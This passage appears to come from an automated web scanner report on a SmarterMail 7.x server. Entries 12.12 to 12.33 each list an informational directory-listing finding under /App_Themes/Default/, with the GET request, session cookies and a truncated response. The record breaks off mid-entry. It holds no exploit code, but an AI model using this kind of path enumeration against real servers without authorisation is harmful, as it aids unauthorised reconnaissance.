Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1472
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Popup/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.12. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Portal/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Portal/

Request

GET /App_Themes/Default/CSS/Portal/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 2520
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Portal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.13. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Print/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Print/

Request

GET /App_Themes/Default/CSS/Print/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1381
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Print/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.14. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Reporting/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Reporting/

Request

GET /App_Themes/Default/CSS/Reporting/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1488
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Reporting/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.15. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Stats/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Stats/

Request

GET /App_Themes/Default/CSS/Stats/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1678
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.16. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Wizard/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/CSS/Wizard/

Request

GET /App_Themes/Default/CSS/Wizard/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1476
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/CSS/Wizard/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/CSS/">[To Parent Directory]</A>
...[SNIP]...

12.17. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/

Request

GET /App_Themes/Default/Controls/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 2174
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.18. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Calendar/

Request

GET /App_Themes/Default/Controls/Calendar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1490
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.19. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Calendar/Img/

Request

GET /App_Themes/Default/Controls/Calendar/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 2758
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Calendar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Calendar/">[To Parent Directory]</A>
...[SNIP]...

12.20. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Combobox/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Combobox/

Request

GET /App_Themes/Default/Controls/Combobox/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1402
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Combobox/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.21. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Common/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Common/

Request

GET /App_Themes/Default/Controls/Common/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1507
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Common/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.22. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Editor/

Request

GET /App_Themes/Default/Controls/Editor/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1876
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.23. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Editor/Img/

Request

GET /App_Themes/Default/Controls/Editor/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 4051
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:blac
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Editor/">[To Parent Directory]</A>
...[SNIP]...

12.24. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Grid/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Grid/

Request

GET /App_Themes/Default/Controls/Grid/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1485
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Grid/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.25. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Input/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Input/

Request

GET /App_Themes/Default/Controls/Input/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1398
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Input/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.26. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Spell/

Request

GET /App_Themes/Default/Controls/Spell/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1589
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.27. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Spell/Img/

Request

GET /App_Themes/Default/Controls/Spell/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 1854
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Spell/">[To Parent Directory]</A>
...[SNIP]...

12.28. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/TabStrip/

Request

GET /App_Themes/Default/Controls/TabStrip/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1591
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.29. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/TabStrip/Img/

Request

GET /App_Themes/Default/Controls/TabStrip/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 1724
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/TabStrip/">[To Parent Directory]</A>
...[SNIP]...

12.30. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Toolbar/

Request

GET /App_Themes/Default/Controls/Toolbar/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:08 GMT
Content-Length: 1585
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.31. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Toolbar/Img/

Request

GET /App_Themes/Default/Controls/Toolbar/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 2094
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bla
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Toolbar/">[To Parent Directory]</A>
...[SNIP]...

12.32. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Window/

Request

GET /App_Themes/Default/Controls/Window/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
Content-Length: 1667
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>
...[SNIP]...

12.33. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/CssImg/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Window/CssImg/

Request

GET /App_Themes/Default/Controls/Window/CssImg/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
